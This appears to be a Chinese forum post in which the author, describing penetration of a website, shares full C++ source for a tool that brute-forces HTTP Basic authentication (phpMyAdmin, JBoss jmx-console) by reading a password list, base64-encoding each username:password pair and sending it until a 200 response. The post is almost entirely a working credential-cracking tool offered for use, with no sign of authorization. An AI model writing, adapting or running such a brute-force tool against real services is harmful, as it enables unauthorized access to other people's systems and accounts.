最近在渗透一个网站,几个PHPMYADMIN用的都是401认证,于是就想自己写一个把,反正在内网也要用到的。
代码写的很渣渣,如果大家在使用中有什么问题,可以告诉我,我来改正。
// Basic.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <iostream>
#include "Basic.h"
#include <winhttp.h>
#include <comdef.h>
#pragma comment (lib,"Winhttp.lib")
const char base[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
char* base64_encode(const char* data, int data_len);
char *base64_encode(char* data, int data_len) //base64_encode function
{
//int data_len = strlen(data);
int prepare = 0;
int ret_len;
int temp = 0;
char *ret = NULL;
char *f = NULL;
int tmp = 0;
char changed[4];
int i = 0;
ret_len = data_len / 3;
temp = data_len % 3;
if (temp > 0)
{
ret_len += 1;
}
ret_len = ret_len*4 + 1;
ret = (char *)malloc(ret_len);
if ( ret == NULL)
{
printf("No enough memory.\n");
exit(0);
}
memset(ret, 0, ret_len);
f = ret;
while (tmp < data_len)
{
temp = 0;
prepare = 0;
memset(changed, '\0', 4);
while (temp < 3)
{
//printf("tmp = %d\n", tmp);
if (tmp >= data_len)
{
break;
}
prepare = ((prepare << 8) | (data[tmp] & 0xFF));
tmp++;
temp++;
}
prepare = (prepare<<((3-temp)*8));
//printf("before for : temp = %d, prepare = %d\n", temp, prepare);
for (i = 0; i < 4 ;i++ )
{
if (temp < i)
{
changed[i] = 0x40;
}
else
{
changed[i] = (prepare>>((3-i)*6)) & 0x3F;
}
*f = base[changed[i]];
//printf("%.2X", changed[i]);
f++;
}
}
*f = '\0';
return ret;
}
static char find_pos(char ch)
{
char *ptr = (char*)strrchr(base, ch);//the last position (the only) in base[]
return (ptr - base);
}
int request_http(wchar_t* Host, int Port,wchar_t* HostPath,wchar_t* Send_result) //send_http function
{
DWORD dwSize = sizeof(DWORD);
DWORD dwStatusCode = 0;
BOOL bResults = FALSE;
HINTERNET hSession = NULL,
hConnect = NULL,
hRequest = NULL;
wchar_t* lpOutBuffer = NULL;
LPSTR pszOutBuffer;
DWORD dwDownloaded = 0;
// Use WinHttpOpen to obtain a session handle.
hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36",
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS,
0 );
// Specify an HTTP server.
if( hSession )
hConnect = WinHttpConnect( hSession,
Host,
Port,
0 );
// Create an HTTP Request handle.
if( hConnect )
hRequest = WinHttpOpenRequest( hConnect,
L"GET",HostPath, // /invoker/JMXInvokerServlet
NULL,
WINHTTP_NO_REFERER,
WINHTTP_DEFAULT_ACCEPT_TYPES,
0 );
// Add a request header.
if( hRequest )
bResults = WinHttpAddRequestHeaders( hRequest,
//L"Authorization:Basic YWRtaW46YWztaW4="
Send_result
,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
bResults = WinHttpAddRequestHeaders( hRequest,
L"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
if( bResults )
bResults = WinHttpSendRequest( hRequest,
WINHTTP_NO_ADDITIONAL_HEADERS,
0,
NULL,0,
NULL,
0 );
// Report any errors.
if( bResults )
bResults = WinHttpReceiveResponse( hRequest, NULL );
if (bResults)
{
Sleep(100);
WinHttpQueryHeaders( hRequest, WINHTTP_QUERY_RAW_HEADERS_CRLF,
WINHTTP_HEADER_NAME_BY_INDEX, NULL,
&dwSize, WINHTTP_NO_HEADER_INDEX);
// Allocate memory for the buffer.
if( GetLastError( ) == ERROR_INSUFFICIENT_BUFFER )
{
lpOutBuffer = new WCHAR[dwSize/sizeof(WCHAR)];
// Now, use WinHttpQueryHeaders to retrieve the header.
bResults = WinHttpQueryHeaders( hRequest,
WINHTTP_QUERY_RAW_HEADERS_CRLF,
WINHTTP_HEADER_NAME_BY_INDEX,lpOutBuffer, &dwSize,
WINHTTP_NO_HEADER_INDEX);
}
}
if (bResults)
{
wchar_t* Servers;
Servers = wcsstr(lpOutBuffer,L"HTTP/1.1 200");
if (Servers != NULL)
{
printf("Password Crack susccessful\r\n");
exit(0);
}
//delete[] lpOutBuffer;
}
/*
if( bResults )
{
do
{
// Check for available data.
dwSize = 0;
if( !WinHttpQueryDataAvailable( hRequest, &dwSize ) )
printf( "Error %u in WinHttpQueryDataAvailable.\n",
GetLastError( ) );
// Allocate space for the buffer.
pszOutBuffer = new char[dwSize+1];
if( !pszOutBuffer )
{
printf( "Out of memory\n" );
dwSize=0;
}
else
{
// Read the data.
ZeroMemory( pszOutBuffer, dwSize+1 );
if( !WinHttpReadData( hRequest, (LPVOID)pszOutBuffer,
dwSize, &dwDownloaded ) )
printf( "Error %u in WinHttpReadData.\n", GetLastError( ) );
else
//printf("xxxx");
printf( "%s", pszOutBuffer );
// Free the memory allocated to the buffer.
delete [] pszOutBuffer;
}
} while( dwSize > 0 );
}
*/
// Report any errors.
if( !bResults )
printf( "Error %d has occurred.\n", GetLastError( ) );
// Close open handles.
if( hRequest ) WinHttpCloseHandle( hRequest );
if( hConnect ) WinHttpCloseHandle( hConnect );
if( hSession ) WinHttpCloseHandle( hSession );
return 0;
}
int main(int argc,char* argv[])
{
if (argc < 5)
{
printf("[-]:Usage %s Crack Basic authentication T00ls\r\n",argv[0]);
printf("[-]:Usage %s 1.0.0.1 8080 /jmx-console/ Admin\r\n",argv[0]);
printf("[-]:Usage %s Warning:Not supported by HTTPS\r\n",argv[0]);
return 0;
}
char input[255] = {0}; //input base64 string
char* strings; //output base64encode string
char buffer[MAX_PATH] = {0};
wchar_t Send_result[1024] = {0};
int i = 0;
wchar_t Hostname[40] = {0};
wchar_t HostPath[100] = {0};
wsprintf(Hostname,L"%S",argv[1]);
//printf("Hostname = %S",Hostname);
int port = atoi(argv[2]);
wsprintf(HostPath,L"%S",argv[3]);
char *Username = argv[4];
FILE* fp = fopen("pass.txt","rb"); //fopen filesName
if (fp == NULL)
{
printf("Read files:pass.txt Error :%d\r\n",GetLastError());
return 0;
}
memset(buffer,0,sizeof(MAX_PATH));
while ((fgets(buffer,MAX_PATH,fp)))
{
//buffer[strlen(buffer) - 1] = '\0';
// if (buffer[strlen(buffer) - 1] = '\n')
// {
// buffer[strlen(buffer) - 1] = '\0';
// }
int slen = 0;
slen = strlen(buffer);
if (buffer[slen -1] == '\n')
{
buffer[slen -1] = '\0';
}
ZeroMemory(input,sizeof(input));
sprintf(input,"%s:%s",Username,buffer);
strings = base64_encode(input,strlen(input)-1);
memset(Send_result,0,sizeof(Send_result));
//printf("%s\r\n",strings);
wsprintfW(Send_result,L"Authorization:Basic %S",strings);
printf("Crack:%S->%d->%S->Password Line:%d->%s\r\n",Hostname,port,HostPath,++i,input);
request_http(Hostname,port,HostPath,Send_result);
}
//free(strings);
fclose(fp);
}